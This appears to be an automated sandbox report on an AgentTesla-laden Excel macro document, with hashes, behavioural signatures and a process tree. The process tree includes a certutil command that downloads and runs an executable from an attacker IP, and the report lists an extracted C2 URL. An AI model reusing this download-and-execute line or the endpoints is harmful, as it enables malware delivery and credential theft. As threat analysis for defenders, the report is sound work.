Analysis
-
max time kernel
135s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2022 09:36
Static task
static1
Behavioral task
behavioral1
Sample
DocRFQ2050023RFT.xlsm
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
DocRFQ2050023RFT.xlsm
Resource
win10v2004-20220812-en
General
-
Target
DocRFQ2050023RFT.xlsm
-
Size
102KB
-
MD5
10752bde286212b1e5ec01803a554c03
-
SHA1
862d54b78dd19d45a980f49201e6acca47857252
-
SHA256
4689852a6e06ba83be08fe943de1159aa8aaad7e1701b5fae5786ddd0930ba23
-
SHA512
7f831287482a9be78033ae840bee703a547ba9e35b922548fbbbbdd4a414748b4fead71f3456b726f1b391d686743febf70cc7163729f0a72f9b375cf620cb4e
-
SSDEEP
3072:yZOKZu86S3Roy9uFwZlsaFPOHYonHBxqPZ5uf:ycYuS/IwZltFPgYonHBxqPZS
Malware Config
Extracted
agenttesla
http://45.155.165.63/3ip/inc/523ecb38582a9c.php
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4732 4212 cmd.exe EXCEL.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exeBstsrrsxagmkhenpstz.exe.exeBstsrrsxagmkhenpstz.exe.exepid process 1300 Bstsrrsxagmkhenpstz.exe.exe 3164 Bstsrrsxagmkhenpstz.exe.exe 1600 Bstsrrsxagmkhenpstz.exe.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Bstsrrsxagmkhenpstz.exe.exe Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Bstsrrsxagmkhenpstz.exe.exe Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Bstsrrsxagmkhenpstz.exe.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\offi = "\"C:\\Users\\Admin\\AppData\\Roaming\\doc\\offi.exe\"" Bstsrrsxagmkhenpstz.exe.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exedescription pid process target process PID 1300 set thread context of 1600 1300 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4212 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exeBstsrrsxagmkhenpstz.exe.exepid process 1300 Bstsrrsxagmkhenpstz.exe.exe 1300 Bstsrrsxagmkhenpstz.exe.exe 1600 Bstsrrsxagmkhenpstz.exe.exe 1600 Bstsrrsxagmkhenpstz.exe.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exeBstsrrsxagmkhenpstz.exe.exedescription pid process Token: SeDebugPrivilege 1300 Bstsrrsxagmkhenpstz.exe.exe Token: SeDebugPrivilege 1600 Bstsrrsxagmkhenpstz.exe.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEBstsrrsxagmkhenpstz.exe.exepid process 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 1600 Bstsrrsxagmkhenpstz.exe.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
EXCEL.EXEcmd.exeBstsrrsxagmkhenpstz.exe.exedescription pid process target process PID 4212 wrote to memory of 4732 4212 EXCEL.EXE cmd.exe PID 4212 wrote to memory of 4732 4212 EXCEL.EXE cmd.exe PID 4732 wrote to memory of 2428 4732 cmd.exe certutil.exe PID 4732 wrote to memory of 2428 4732 cmd.exe certutil.exe PID 4732 wrote to memory of 1300 4732 cmd.exe Bstsrrsxagmkhenpstz.exe.exe PID 4732 wrote to memory of 1300 4732 cmd.exe Bstsrrsxagmkhenpstz.exe.exe PID 4732 wrote to memory of 1300 4732 cmd.exe Bstsrrsxagmkhenpstz.exe.exe PID 1300 wrote to memory of 3164 1300 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1300 wrote to memory of 3164 1300 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1300 wrote to memory of 3164 1300 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1300 wrote to memory of 1600 1300 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1300 wrote to memory of 1600 1300 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1300 wrote to memory of 1600 1300 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1300 wrote to memory of 1600 1300 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1300 wrote to memory of 1600 1300 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1300 wrote to memory of 1600 1300 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1300 wrote to memory of 1600 1300 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1300 wrote to memory of 1600 1300 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe -
outlook_office_path 1 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Bstsrrsxagmkhenpstz.exe.exe -
outlook_win_path 1 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Bstsrrsxagmkhenpstz.exe.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\DocRFQ2050023RFT.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c certutil.exe -urlcache -split -f "http://45.155.165.63/br1/loader/uploads/Doc_2050023_RFT.exe" Bstsrrsxagmkhenpstz.exe.exe && Bstsrrsxagmkhenpstz.exe.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil.exe -urlcache -split -f "http://45.155.165.63/br1/loader/uploads/Doc_2050023_RFT.exe" Bstsrrsxagmkhenpstz.exe.exe3⤵
-
C:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exeBstsrrsxagmkhenpstz.exe.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exeC:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exeC:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exe4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Bstsrrsxagmkhenpstz.exe.exe.logFilesize
1KB
MD57e88081fcf716d85992bb3af3d9b6454
SHA12153780fbc71061b0102a7a7b665349e1013e250
SHA2565ffb4a3ea94a6a53c4f88e2191c6fec5fd8a7336e367aa113fe8c12631e0c4d2
SHA512ec606e14367ae221c04f213a61a6f797034495121198e4788e3afa4aa8db67bf59c5c5210a56afae5557158e8923b013b371b84c7d64303618c5b4c57a2224f7
-
C:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exeFilesize
1.4MB
MD510dcb9e5aabe78f2bf22481b70658d15
SHA119dad72451cb471f9762a6a7c72e57f2f17197bf
SHA256fc23a4a16e5f2ad4467d969f7a53b5a67d9d3d33ef3d427c7aa883916f8c251c
SHA5121afc876a8b5626a38af604a30127b0a1af9d0aa358b7fdb0e544e0f408a6599a7df5283fe09896eee04bd859b1dc0aff83481911a2e4a37bc02f1465f8f3f6dc
-
C:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exeFilesize
1.4MB
MD510dcb9e5aabe78f2bf22481b70658d15
SHA119dad72451cb471f9762a6a7c72e57f2f17197bf
SHA256fc23a4a16e5f2ad4467d969f7a53b5a67d9d3d33ef3d427c7aa883916f8c251c
SHA5121afc876a8b5626a38af604a30127b0a1af9d0aa358b7fdb0e544e0f408a6599a7df5283fe09896eee04bd859b1dc0aff83481911a2e4a37bc02f1465f8f3f6dc
-
C:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exeFilesize
1.4MB
MD510dcb9e5aabe78f2bf22481b70658d15
SHA119dad72451cb471f9762a6a7c72e57f2f17197bf
SHA256fc23a4a16e5f2ad4467d969f7a53b5a67d9d3d33ef3d427c7aa883916f8c251c
SHA5121afc876a8b5626a38af604a30127b0a1af9d0aa358b7fdb0e544e0f408a6599a7df5283fe09896eee04bd859b1dc0aff83481911a2e4a37bc02f1465f8f3f6dc
-
C:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exeFilesize
1.4MB
MD510dcb9e5aabe78f2bf22481b70658d15
SHA119dad72451cb471f9762a6a7c72e57f2f17197bf
SHA256fc23a4a16e5f2ad4467d969f7a53b5a67d9d3d33ef3d427c7aa883916f8c251c
SHA5121afc876a8b5626a38af604a30127b0a1af9d0aa358b7fdb0e544e0f408a6599a7df5283fe09896eee04bd859b1dc0aff83481911a2e4a37bc02f1465f8f3f6dc
-
memory/1300-141-0x0000000000000000-mapping.dmp
-
memory/1300-145-0x0000000005CF0000-0x0000000005D12000-memory.dmpFilesize
136KB
-
memory/1300-144-0x0000000000F20000-0x0000000001094000-memory.dmpFilesize
1.5MB
-
memory/1600-154-0x0000000006200000-0x0000000006266000-memory.dmpFilesize
408KB
-
memory/1600-152-0x0000000005A90000-0x0000000006034000-memory.dmpFilesize
5.6MB
-
memory/1600-153-0x0000000005610000-0x00000000056AC000-memory.dmpFilesize
624KB
-
memory/1600-149-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1600-155-0x00000000068C0000-0x0000000006910000-memory.dmpFilesize
320KB
-
memory/1600-161-0x0000000007120000-0x00000000071B2000-memory.dmpFilesize
584KB
-
memory/1600-162-0x00000000070F0000-0x00000000070FA000-memory.dmpFilesize
40KB
-
memory/1600-148-0x0000000000000000-mapping.dmp
-
memory/2428-140-0x0000000000000000-mapping.dmp
-
memory/3164-146-0x0000000000000000-mapping.dmp
-
memory/4212-132-0x00007FFA8D5B0000-0x00007FFA8D5C0000-memory.dmpFilesize
64KB
-
memory/4212-138-0x00007FFA8AF20000-0x00007FFA8AF30000-memory.dmpFilesize
64KB
-
memory/4212-137-0x00007FFA8AF20000-0x00007FFA8AF30000-memory.dmpFilesize
64KB
-
memory/4212-136-0x00007FFA8D5B0000-0x00007FFA8D5C0000-memory.dmpFilesize
64KB
-
memory/4212-135-0x00007FFA8D5B0000-0x00007FFA8D5C0000-memory.dmpFilesize
64KB
-
memory/4212-157-0x00007FFA8D5B0000-0x00007FFA8D5C0000-memory.dmpFilesize
64KB
-
memory/4212-158-0x00007FFA8D5B0000-0x00007FFA8D5C0000-memory.dmpFilesize
64KB
-
memory/4212-159-0x00007FFA8D5B0000-0x00007FFA8D5C0000-memory.dmpFilesize
64KB
-
memory/4212-160-0x00007FFA8D5B0000-0x00007FFA8D5C0000-memory.dmpFilesize
64KB
-
memory/4212-134-0x00007FFA8D5B0000-0x00007FFA8D5C0000-memory.dmpFilesize
64KB
-
memory/4212-133-0x00007FFA8D5B0000-0x00007FFA8D5C0000-memory.dmpFilesize
64KB
-
memory/4732-139-0x0000000000000000-mapping.dmp